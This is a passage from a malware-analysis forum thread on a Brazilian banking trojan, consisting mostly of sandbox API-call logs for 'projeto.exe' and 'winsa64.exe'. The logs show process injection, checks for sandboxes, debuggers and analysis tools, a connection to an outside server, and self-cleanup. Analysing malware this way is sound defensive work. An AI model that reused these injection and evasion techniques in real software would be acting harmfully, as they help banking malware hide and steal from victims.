   * Creates a mutex "RasPbFile".
   * Lists all entry names in a remote access phone book.
   * Opens a service named "RASMAN".
   * Opens a service named "Sens".
   * Injects code into process "c:\windows\system32\drwtsn32.exe".
   * Creates an event named "DbgEngEvent_00000550".
   * Injects code into process "c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe".
   * Terminates process "à?¤\dee\harskvol1\do".
   * Contains string Anubis detection routine found ("76487-337-8429955-22614")
   * Contains string Sandboxie detection routine found ("SbieDll.dll")

Timers:

It captures the valid certificates for the following Brazilian banks:

Connection to the server (regardless of the browser...):

The file "mario.php" was empty, neither an iframe nor code:

Searching for files on its server I find this HTML, with a reference to two banks:

I could have extracted much more information if I had run it on a real machine; it aborts connections and the creation of some files in the presence of a virtual environment.

879  Computer Security / Malware Analysis and Design / Re: Banking trojan II (different configuration). on: 16 February 2013, 14:40 pm
Analysis of the file "projeto.exe":

Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\Projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ResumeThread() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(Projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(dbghelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(SbieDll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(wsock32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateEvent(ShellCopyEngineRunning) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetComputerName() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateEvent(ShellCopyEngineFinished) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateProcess((null),C:\WINDOWS\winsa64.exe,C:\WINDOWS) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\apphelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
WriteProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ExitProcess(0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
Executing: c:\windows\winsa64.exe
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,103000,PAGE_READWRITE) [c:\windows\winsa64.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(kernel32.dll) [c:\windows\winsa64.exe]
LoadLibrary(user32.dll) [c:\windows\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\windows\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\windows\winsa64.exe]
LoadLibrary(ole32.dll) [c:\windows\winsa64.exe]
LoadLibrary(version.dll) [c:\windows\winsa64.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(gdi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(wininet.dll) [c:\windows\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\windows\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\windows\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\windows\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\windows\winsa64.exe]
LoadLibrary(lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\windows\winsa64.exe]
VirtualQueryEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(Kernel32) [c:\windows\winsa64.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\winsa64.exe]
OpenProcessToken(C:\WINDOWS\winsa64.exe) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\winsa64.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ResumeThread() [c:\windows\winsa64.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\windows\winsa64.exe]
OpenProcess(winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(USER32) [c:\windows\winsa64.exe]
LoadLibrary(imm32.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\winsa64.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_NOACCESS) [c:\windows\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\windows\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\windows\winsa64.exe]
BitBlt() [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_EXECUTE_READWRITE) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(version.dll) [c:\windows\winsa64.exe]
FreeLibrary() [c:\windows\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\windows\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\windows\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\windows\winsa64.exe]
LoadLibrary(shell32.dll) [c:\windows\winsa64.exe]
CreateMutex(INSONIA) [c:\windows\winsa64.exe]
CreateFile(C:\WINDOWS\winsa64.cfg) [c:\windows\winsa64.exe]
Sleep(100) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\windows\winsa64.exe]
LoadLibrary(hnetcfg.dll) [c:\windows\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\windows\winsa64.exe]
LoadLibrary(dnsapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\winrnr.dll) [c:\windows\winsa64.exe]
LoadLibrary(wldap32.dll) [c:\windows\winsa64.exe]
LoadLibrary(rasadhlp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(ws2_32.dll) [c:\windows\winsa64.exe]
connect( 212.1.208.24:80 ) [c:\windows\winsa64.exe]
DeleteFile(C:\WINDOWS\a.exe) [c:\windows\winsa64.exe]
Sleep(60000000) [c:\windows\winsa64.exe]

It downloads two files, "winsa64.exe" and the file "winsa64.cfg", which contains the associated no-ip domain:

Analysis of the file "winsa64.exe" (API log):

Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
ResumeThread() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateEvent(ShellCopyEngineRunning) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetComputerName() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateEvent(ShellCopyEngineFinished) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateProcess((null),C:\WINDOWS\winsa64.exe,C:\WINDOWS) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
WriteProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
ExitProcess(0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
Executing: c:\windows\winsa64.exe
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,103000,PAGE_READWRITE) [c:\windows\winsa64.exe]
